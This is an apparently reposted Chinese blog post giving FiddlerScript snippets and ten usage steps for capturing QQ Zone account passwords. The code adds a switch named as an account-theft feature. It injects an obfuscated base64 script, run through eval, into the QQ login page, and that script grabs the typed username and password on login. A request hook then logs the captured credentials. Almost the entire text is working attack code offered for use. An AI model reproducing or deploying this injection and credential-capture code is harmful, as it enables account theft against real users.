admin管理员组文章数量:1530867
代码片段1
//放入FiddlerScript最开头
import System.Text.RegularExpressions;
代码片段2
//放在OnBeforeRequest上面
public static RulesOption("是否开启QQ空间盗号功能")
BindPref("fiddlerscript.rules.daohao")
var m_daohao: boolean = false;
static function getQQ(QQBody){
//下面是正则表达式用法
var r = new Regex('user=(.*?)&pass=(.*?)$');
var mc = r.Match(QQBody);
if(mc.Groups[1].Value == ""){
//没有匹配到,不再执行后面的代码
FiddlerObject.log("[提示]:获取QQ空间密码失败,检查一下植入JS代码是否成功");
return;
}
FiddlerObject.log("[提示]:获取账号密码成功,账号为:"+mc.Groups[1].Value+"密码为:"+mc.Groups[2].Value);
}
代码片段3
//OnBeforeRequest里面
if(m_daohao && oSession.fullUrl.Contains("xui.ptlogin2.qq/data?user")){
FiddlerObject.log("[提示]:正在获取账号信息");
var url = oSession.fullUrl;
getQQ(url)
}
代码片段4
//OnBeforeResponse里面
if(m_daohao && oSession.fullUrl.Contains("https://xui.ptlogin2.qq/cgi-bin/xlogin?proxy_url=")){
//解码数据包,防止乱码
oSession.utilDecodeResponse();
//替换数据包
oSession.utilReplaceInResponse("</html>",'<script>eval(atob("ZnVuY3Rpb24gbG9hZFhNTERvYyh1c2VyLHBhc3MpDQp7DQoJdmFyIHhtbGh0dHA7DQoJaWYgKHdpbmRvdy5YTUxIdHRwUmVxdWVzdCkNCgl7DQoJCQ0KCQl4bWxodHRwPW5ldyBYTUxIdHRwUmVxdWVzdCgpOw0KCX0NCgllbHNlDQoJew0KCQkNCgkJeG1saHR0cD1uZXcgQWN0aXZlWE9iamVjdCgiTWljcm9zb2Z0LlhNTEhUVFAiKTsNCgl9DQoJeG1saHR0cC5vbnJlYWR5c3RhdGVjaGFuZ2U9ZnVuY3Rpb24oKQ0KCXsNCgkJaWYgKHhtbGh0dHAucmVhZHlTdGF0ZT09NCAmJiB4bWxodHRwLnN0YXR1cz09MjAwKQ0KCQl7DQoJCQlkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgibXlEaXYiKS5pbm5lckhUTUw9eG1saHR0cC5yZXNwb25zZVRleHQ7DQoJCX0NCgl9DQoJeG1saHR0cC5vcGVuKCJHRVQiLCIvZGF0YT91c2VyPSIrdXNlcisiJnBhc3M9IitwYXNzLHRydWUpOw0KCXhtbGh0dHAuc2VuZCgpOw0KfQ0KDQpkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgibG9naW5fYnV0dG9uIikuYWRkRXZlbnRMaXN0ZW5lcigiY2xpY2siLGZ1bmN0aW9uKCl7DQoJdmFyIHVzZXIgPSBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgidSIpLnZhbHVlOw0KCXZhciBwd2QgPSBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgicCIpLnZhbHVlOw0KCWxvYWRYTUxEb2ModXNlcixwd2QpDQp9KQ=="))</script></html>')
}
代码使用步骤:
1.点击FiddlerScript
2.复制代码片段1,粘贴到最顶上
3.点击Go to:OnBeforeRequest
4.复制代码片段2,将代码粘贴到OnBeforeRequest上面,注意粘贴在OnBeforeRquest和括号之间
5.复制代码片段3,将代码粘贴到OnBeforeRequest里面,注意括号
6.点击Go to:OnBeforeResponse
7.复制代码片段4,将代码粘贴到OnBeforeResponse里面 ,注意在if前面
8.点击Rules,可以自由选择开启或者关闭盗号功能
9.进入QQ空间,强制刷新QQ空间(Ctrl+F5),然后输入账号密码
10.来到Fiddler,点击Log,查看获取的内容
本文标签: 账号密码空间FiddlerScriptqq
版权声明:本文标题:FiddlerScript实现对QQ空间账号密码获取 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://m.elefans.com/xitong/1726251342a1062510.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论